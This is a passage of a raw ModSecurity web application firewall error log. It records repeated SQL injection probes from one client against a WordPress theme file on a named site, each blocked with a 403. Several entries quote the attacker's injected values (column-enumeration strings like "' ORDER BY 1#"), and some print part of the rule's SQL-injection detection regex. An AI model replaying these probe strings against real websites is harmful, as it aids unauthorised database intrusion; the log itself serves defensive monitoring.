?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGxXug2jzbr_AlO3d0LAAAAMw"] [Sun Jul 07 16:21:11.768646 2024] [:error] [pid 30827:tid 139722642933504] [client 141.98.81.37:38178] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGx0GuaLybMBNkB61uNAAAAEM"] [Sun Jul 07 16:21:12.004981 2024] [:error] [pid 31926:tid 139722491864832] [client 141.98.81.37:38180] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGyHug2jzbr_AlO3d0LQAAANU"] [Sun Jul 07 16:21:13.065817 2024] [:error] [pid 30827:tid 139722592577280] [client 141.98.81.37:38182] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGyUGuaLybMBNkB61uNQAAAEk"] [Sun Jul 07 16:21:14.103502 2024] [:error] [pid 30827:tid 139722567399168] [client 141.98.81.37:38184] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGykGuaLybMBNkB61uNgAAAEw"] [Sun Jul 07 16:21:15.134985 2024] [:error] [pid 30827:tid 139722491864832] [client 141.98.81.37:38186] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGy0GuaLybMBNkB61uNwAAAFU"] [Sun Jul 07 16:21:16.237807 2024] [:error] [pid 31926:tid 139722525435648] [client 141.98.81.37:38190] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGzHug2jzbr_AlO3d0LgAAANE"] [Sun Jul 07 16:21:18.387728 2024] [:error] [pid 30828:tid 139722508650240] [client 141.98.81.37:38198] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGzjbJWLg2ecbngu9JkQAAAJM"] [Sun Jul 07 16:21:18.635308 2024] [:error] [pid 31926:tid 139722550613760] [client 141.98.81.37:38204] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGznug2jzbr_AlO3d0LwAAAM4"] [Sun Jul 07 16:21:23.174896 2024] [:error] [pid 31926:tid 139722559006464] [client 141.98.81.37:38218] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG03ug2jzbr_AlO3d0MgAAAM0"] [Sun Jul 07 16:21:23.464269 2024] [:error] [pid 30827:tid 139722634540800] [client 141.98.81.37:38220] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG00GuaLybMBNkB61uOAAAAEQ"] [Sun Jul 07 16:21:24.574185 2024] [:error] [pid 31926:tid 139722575791872] [client 141.98.81.37:38224] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47%' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG1Hug2jzbr_AlO3d0MwAAAMs"] [Sun Jul 07 16:21:25.483971 2024] [:error] [pid 30828:tid 139722483472128] [client 141.98.81.37:38226] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG1TbJWLg2ecbngu9JlAAAAJY"] [Sun Jul 07 16:21:26.625215 2024] [:error] [pid 31926:tid 139722592577280] [client 141.98.81.37:38230] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG1nug2jzbr_AlO3d0NQAAAMk"] [Sun Jul 07 16:21:27.620470 2024] [:error] [pid 31926:tid 139722500257536] [client 141.98.81.37:38232] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG13ug2jzbr_AlO3d0NgAAANQ"] [Sun Jul 07 16:21:28.694738 2024] [:error] [pid 31926:tid 139722642933504] [client 141.98.81.37:38234] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG2Hug2jzbr_AlO3d0NwAAAMM"] [Sun Jul 07 16:21:29.867752 2024] [:error] [pid 30827:tid 139722550613760] [client 141.98.81.37:38236] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG2UGuaLybMBNkB61uOQAAAE4"] [Sun Jul 07 16:21:31.001499 2024] [:error] [pid 31926:tid 139722659718912] [client 141.98.81.37:38238] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG23ug2jzbr_AlO3d0OAAAAME"] [Sun Jul 07 16:21:32.101687 2024] [:error] [pid 31926:tid 139722626148096] [client 141.98.81.37:38240] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG3Hug2jzbr_AlO3d0OQAAAMU"] [Sun Jul 07 16:21:32.817365 2024] [:error] [pid 31926:tid 139722567399168] [client 141.98.81.37:38242] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG3Hug2jzbr_AlO3d0OgAAAMw"] [Sun Jul 07 16:21:33.904217 2024] [:error] [pid 31926:tid 139722491864832] [client 141.98.81.37:38244] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG3Xug2jzbr_AlO3d0OwAAANU"] [Sun Jul 07 16:21:35.382539 2024] [:error] [pid 31926:tid 139722525435648] [client 141.98.81.37:38246] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG33ug2jzbr_AlO3d0PAAAANE"] [Sun Jul 07 16:21:36.031372 2024] [:error] [pid 31926:tid 139722584184576] [client 141.98.81.37:38248] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG4Hug2jzbr_AlO3d0PQAAAMo"] [Sun Jul 07 16:21:37.101294 2024] [:error] [pid 31926:tid 139722550613760] [client 141.98.81.37:38250] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG4Xug2jzbr_AlO3d0PgAAAM4"] [Sun Jul 07 16:21:39.027402 2024] [:error] [pid 31926:tid 139722542221056] [client 141.98.81.37:38252] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG43ug2jzbr_AlO3d0PwAAAM8"] [Sun Jul 07 16:21:39.272341 2024] [:error] [pid 31926:tid 139722634540800] [client 141.98.81.37:38254] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG43ug2jzbr_AlO3d0QAAAAMQ"] [Sun Jul 07 16:21:40.342047 2024] [:error] [pid 31926:tid 139722559006464] [client 141.98.81.37:38256] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG5Hug2jzbr_AlO3d0QQAAAM0"] [Sun Jul 07 16:21:41.437356 2024] [:error] [pid 31926:tid 139722533828352] [client 141.98.81.37:38258] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG5Xug2jzbr_AlO3d0QgAAANA"] [Sun Jul 07 16:21:42.493353 2024] [:error] [pid 31926:tid 139722575791872] [client 141.98.81.37:38260] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG5nug2jzbr_AlO3d0QwAAAMs"] [Sun Jul 07 16:21:43.573340 2024] [:error] [pid 31926:tid 139722483472128] [client 141.98.81.37:38262] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG53ug2jzbr_AlO3d0RAAAANY"] [Sun Jul 07 16:21:44.633470 2024] [:error] [pid 30828:tid 139722642933504] [client 141.98.81.37:38264] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] 